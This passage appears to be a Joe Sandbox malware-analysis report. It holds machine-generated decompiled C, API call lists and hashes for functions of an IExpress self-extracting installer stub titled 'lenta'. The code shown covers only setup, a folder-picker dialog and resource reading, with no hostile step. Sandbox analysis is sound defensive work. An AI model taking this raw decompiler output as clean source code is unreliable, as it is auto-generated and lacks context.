                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                            				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                                                            				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                                                            				_t23 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                                                            					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                                                            					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                                                            					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                                                            					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                                                            					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                                                            					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                                                            					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                                                            					_t39 = _t36;
                                                                                                                                                                                                                                            					if(_t36 == 0xbb40e64e || ( *0x8d8004 & 0xffff0000) == 0) {
                                                                                                                                                                                                                                            						_t36 = 0xbb40e64f;
                                                                                                                                                                                                                                            						_t39 = 0xbb40e64f;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0x8d8004 = _t39;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t37 =  !_t36;
                                                                                                                                                                                                                                            				 *0x8d8008 = _t37;
                                                                                                                                                                                                                                            				return _t37;
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 008D7182
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 008D7191
                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 008D719A
                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 008D71A3
                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 008D71B8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1445889803-0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D6CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                            				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                                                            				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                                                            			}



                                                                                                                                                                                                                                            0x008d6cf7
                                                                                                                                                                                                                                            0x008d6d00
                                                                                                                                                                                                                                            0x008d6d19

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,008D6E26,008D1000), ref: 008D6CF7
                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(008D6E26,?,008D6E26,008D1000), ref: 008D6D00
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409,?,008D6E26,008D1000), ref: 008D6D0B
                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,008D6E26,008D1000), ref: 008D6D12
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3231755760-0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                                                                                                            			E008D3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				int _t20;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				int _t23;
                                                                                                                                                                                                                                            				char _t24;
                                                                                                                                                                                                                                            				long _t25;
                                                                                                                                                                                                                                            				int _t27;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                                            				int _t33;
                                                                                                                                                                                                                                            				int _t34;
                                                                                                                                                                                                                                            				int _t37;
                                                                                                                                                                                                                                            				int _t38;
                                                                                                                                                                                                                                            				int _t39;
                                                                                                                                                                                                                                            				void* _t42;
                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                            				CHAR* _t49;
                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				struct HWND__* _t64;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t64 = _a4;
                                                                                                                                                                                                                                            				_t6 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t6 == 0) {
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					L38:
                                                                                                                                                                                                                                            					EndDialog(_t64, ??);
                                                                                                                                                                                                                                            					L39:
                                                                                                                                                                                                                                            					__eflags = 1;
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t42 = 1;
                                                                                                                                                                                                                                            				_t10 = _t6 - 0x100;
                                                                                                                                                                                                                                            				if(_t10 == 0) {
                                                                                                                                                                                                                                            					E008D43D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                                                            					SetWindowTextA(_t64, "lenta");
                                                                                                                                                                                                                                            					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                                                            					__eflags =  *0x8d9a40 - _t42; // 0x3
                                                                                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                                                                                            						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L36:
                                                                                                                                                                                                                                            					return _t42;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t10 == _t42) {
                                                                                                                                                                                                                                            					_t20 = _a12 - 1;
                                                                                                                                                                                                                                            					__eflags = _t20;
                                                                                                                                                                                                                                            					if(_t20 == 0) {
                                                                                                                                                                                                                                            						_t21 = GetDlgItemTextA(_t64, 0x835, 0x8d91e4, 0x104);
                                                                                                                                                                                                                                            						__eflags = _t21;
                                                                                                                                                                                                                                            						if(_t21 == 0) {
                                                                                                                                                                                                                                            							L32:
                                                                                                                                                                                                                                            							_t58 = 0x4bf;
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0x10);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							L25:
                                                                                                                                                                                                                                            							E008D44B9(_t64, _t58);
                                                                                                                                                                                                                                            							goto L39;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t49 = 0x8d91e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t23 =  *_t49;
                                                                                                                                                                                                                                            							_t49 =  &(_t49[1]);
                                                                                                                                                                                                                                            							__eflags = _t23;
                                                                                                                                                                                                                                            						} while (_t23 != 0);
						__eflags = _t49 - 0x8d91e5 - 3;
						if(_t49 - 0x8d91e5 < 3) {
							goto L32;
						}
						_t24 =  *0x8d91e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0x8d91e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E008D658A(0x8d91e4, 0x104, 0x8d1140);
								_t27 = E008D58C8(0x8d91e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0x8d91e4 - 0x5c;
									if( *0x8d91e4 != 0x5c) {
										L30:
										_t30 = E008D597D(0x8d91e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0x8d91e5 - 0x5c;
									if( *0x8d91e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E008D44B9(_t64, 0x54a, 0x8d91e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x8d91e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0x8d91e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x8d91e4 - 0x5c;
						if( *0x8d91e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x8d9124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x8d9a3c, 0x3e8, 0x8d8598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E008D4224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x8d87a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E008D44B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

























                                                                                                                                                                                                                                            0x008d33df
                                                                                                                                                                                                                                            0x008d3370
                                                                                                                                                                                                                                            0x008d3372
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3372
                                                                                                                                                                                                                                            0x008d32fc
                                                                                                                                                                                                                                            0x008d3301
                                                                                                                                                                                                                                            0x008d3301
                                                                                                                                                                                                                                            0x008d3303
                                                                                                                                                                                                                                            0x008d3304
                                                                                                                                                                                                                                            0x008d3304
                                                                                                                                                                                                                                            0x008d330a
                                                                                                                                                                                                                                            0x008d330d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3313
                                                                                                                                                                                                                                            0x008d3318
                                                                                                                                                                                                                                            0x008d331a
                                                                                                                                                                                                                                            0x008d3331
                                                                                                                                                                                                                                            0x008d3332
                                                                                                                                                                                                                                            0x008d333a
                                                                                                                                                                                                                                            0x008d333d
                                                                                                                                                                                                                                            0x008d337c
                                                                                                                                                                                                                                            0x008d3388
                                                                                                                                                                                                                                            0x008d338f
                                                                                                                                                                                                                                            0x008d3394
                                                                                                                                                                                                                                            0x008d3396
                                                                                                                                                                                                                                            0x008d33a4
                                                                                                                                                                                                                                            0x008d33ab
                                                                                                                                                                                                                                            0x008d33b6
                                                                                                                                                                                                                                            0x008d33be
                                                                                                                                                                                                                                            0x008d33c3
                                                                                                                                                                                                                                            0x008d33c5
                                                                                                                                                                                                                                            0x008d3435
                                                                                                                                                                                                                                            0x008d3437
                                                                                                                                                                                                                                            0x008d3437
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3437
                                                                                                                                                                                                                                            0x008d33c7
                                                                                                                                                                                                                                            0x008d33c9
                                                                                                                                                                                                                                            0x008d33cc
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d33cc
                                                                                                                                                                                                                                            0x008d33ad
                                                                                                                                                                                                                                            0x008d33b4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d33b4
                                                                                                                                                                                                                                            0x008d3398
                                                                                                                                                                                                                                            0x008d3399
                                                                                                                                                                                                                                            0x008d339b
                                                                                                                                                                                                                                            0x008d339c
                                                                                                                                                                                                                                            0x008d339d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d339d
                                                                                                                                                                                                                                            0x008d334c
                                                                                                                                                                                                                                            0x008d3351
                                                                                                                                                                                                                                            0x008d3354
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d335c
                                                                                                                                                                                                                                            0x008d3362
                                                                                                                                                                                                                                            0x008d3364
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3366
                                                                                                                                                                                                                                            0x008d3367
                                                                                                                                                                                                                                            0x008d3369
                                                                                                                                                                                                                                            0x008d336a
                                                                                                                                                                                                                                            0x008d336b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d336b
                                                                                                                                                                                                                                            0x008d331c
                                                                                                                                                                                                                                            0x008d3323
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3329
                                                                                                                                                                                                                                            0x008d332b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d332b
                                                                                                                                                                                                                                            0x008d324c
                                                                                                                                                                                                                                            0x008d324c
                                                                                                                                                                                                                                            0x008d324f
                                                                                                                                                                                                                                            0x008d32c8
                                                                                                                                                                                                                                            0x008d32ce
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d32ce
                                                                                                                                                                                                                                            0x008d3251
                                                                                                                                                                                                                                            0x008d3256
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3271
                                                                                                                                                                                                                                            0x008d3277
                                                                                                                                                                                                                                            0x008d3279
                                                                                                                                                                                                                                            0x008d3298
                                                                                                                                                                                                                                            0x008d329d
                                                                                                                                                                                                                                            0x008d329f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d32b0
                                                                                                                                                                                                                                            0x008d32b6
                                                                                                                                                                                                                                            0x008d32b8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d32be
                                                                                                                                                                                                                                            0x008d3280
                                                                                                                                                                                                                                            0x008d3289
                                                                                                                                                                                                                                            0x008d328e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d328e
                                                                                                                                                                                                                                            0x008d327b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d327b
                                                                                                                                                                                                                                            0x00000000

APIs
• LoadStringA.USER32(000003E8,008D8598,00000200), ref: 008D3271
• GetDesktopWindow.USER32 ref: 008D33E2
• SetWindowTextA.USER32(?,lenta), ref: 008D33F7
• SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 008D3410
• GetDlgItem.USER32(?,00000836), ref: 008D3426
• EnableWindow.USER32(00000000), ref: 008D342D
• EndDialog.USER32(?,00000000), ref: 008D343F
Strings
Memory Dump Source
• Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$lenta
                                                                                                                                                                                                                                            • API String ID: 2418873061-2614117474
                                                                                                                                                                                                                                            • Opcode ID: 5c4998908c98a0e13a553eecfecf5cfec8bebf061799d4ce77f9c88002bf3de5
                                                                                                                                                                                                                                            • Instruction ID: 11efc6095d68463d652781062c80976901b03b06958caa1791edac6f23c0755f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c4998908c98a0e13a553eecfecf5cfec8bebf061799d4ce77f9c88002bf3de5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84513B3038225177EB255B796C8CF7F3B59FB56B55F10432BF246D63C0CAA88A0192A7
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E008D2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				struct HRSRC__* _t31;
                                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                                            				void* _t43;
                                                                                                                                                                                                                                            				void* _t48;
                                                                                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t13 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                                                            				_t65 = 0;
                                                                                                                                                                                                                                            				_t66 = __ecx;
                                                                                                                                                                                                                                            				_t48 = __edx;
                                                                                                                                                                                                                                            				 *0x8d9a3c = __ecx;
                                                                                                                                                                                                                                            				memset(0x8d9140, 0, 0x8fc);
                                                                                                                                                                                                                                            				memset(0x8d8a20, 0, 0x32c);
                                                                                                                                                                                                                                            				memset(0x8d88c0, 0, 0x104);
                                                                                                                                                                                                                                            				 *0x8d93ec = 1;
                                                                                                                                                                                                                                            				_t20 = E008D468F("TITLE", 0x8d9154, 0x7f);
                                                                                                                                                                                                                                            				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                                                            					_t64 = 0x4b1;
                                                                                                                                                                                                                                            					goto L32;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                                                            					 *0x8d858c = _t27;
                                                                                                                                                                                                                                            					SetEvent(_t27);
                                                                                                                                                                                                                                            					_t64 = 0x8d9a34;
                                                                                                                                                                                                                                            					if(E008D468F("EXTRACTOPT", 0x8d9a34, 4) != 0) {
                                                                                                                                                                                                                                            						if(( *0x8d9a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                            							L12:
                                                                                                                                                                                                                                            							 *0x8d9120 =  *0x8d9120 & _t65;
                                                                                                                                                                                                                                            							if(E008D5C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                                                            								if( *0x8d8a3a == 0) {
                                                                                                                                                                                                                                            									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                                                            									if(_t31 != 0) {
                                                                                                                                                                                                                                            										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if( *0x8d8184 != 0) {
                                                                                                                                                                                                                                            										__imp__#17();
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if( *0x8d8a24 == 0) {
                                                                                                                                                                                                                                            										_t57 = _t65;
                                                                                                                                                                                                                                            										if(E008D36EE(_t65) == 0) {
                                                                                                                                                                                                                                            											goto L33;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t33 =  *0x8d9a40; // 0x3
                                                                                                                                                                                                                                            											_t48 = 1;
                                                                                                                                                                                                                                            											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                                                            												if(( *0x8d9a34 & 0x00000100) == 0 || ( *0x8d8a38 & 0x00000001) != 0 || E008D18A3(_t64, _t66) != 0) {
                                                                                                                                                                                                                                            													goto L30;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t64 = 0x7d6;
                                                                                                                                                                                                                                            													if(E008D6517(_t57, 0x7d6, _t34, E008D19E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                                                            														goto L33;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L30;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												L30:
                                                                                                                                                                                                                                            												_t23 = _t48;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t23 = 1;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E008D2390(0x8d8a3a);
                                                                                                                                                                                                                                            									goto L33;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t64 = 0x520;
                                                                                                                                                                                                                                            								L32:
                                                                                                                                                                                                                                            								E008D44B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            								goto L33;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t64 =  &_v268;
                                                                                                                                                                                                                                            							if(E008D468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            								goto L3;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                                                            								 *0x8d8588 = _t43;
                                                                                                                                                                                                                                            								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                                                            									goto L12;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									if(( *0x8d9a34 & 0x00000080) == 0) {
                                                                                                                                                                                                                                            										_t64 = 0x524;
                                                                                                                                                                                                                                            										if(E008D44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                                                            											goto L12;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L11;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t64 = 0x54b;
                                                                                                                                                                                                                                            										E008D44B9(0, 0x54b, "lenta", 0, 0x10, 0);
                                                                                                                                                                                                                                            										L11:
                                                                                                                                                                                                                                            										CloseHandle( *0x8d8588);
                                                                                                                                                                                                                                            										 *0x8d9124 = 0x800700b7;
                                                                                                                                                                                                                                            										goto L33;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						L3:
                                                                                                                                                                                                                                            						_t64 = 0x4b1;
                                                                                                                                                                                                                                            						E008D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						 *0x8d9124 = 0x80070714;
                                                                                                                                                                                                                                            						L33:
                                                                                                                                                                                                                                            						_t23 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E008D6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 008D2CD9
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 008D2CE9
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 008D2CF9
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46A0
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: SizeofResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46A9
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46C3
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: LoadResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46CC
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: LockResource.KERNEL32(00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46D3
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: memcpy_s.MSVCRT ref: 008D46E5
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46EF
                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D2D34
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 008D2D40
                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 008D2DAE
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 008D2DBD
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 008D2E0A
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008D4518
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 008D4554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
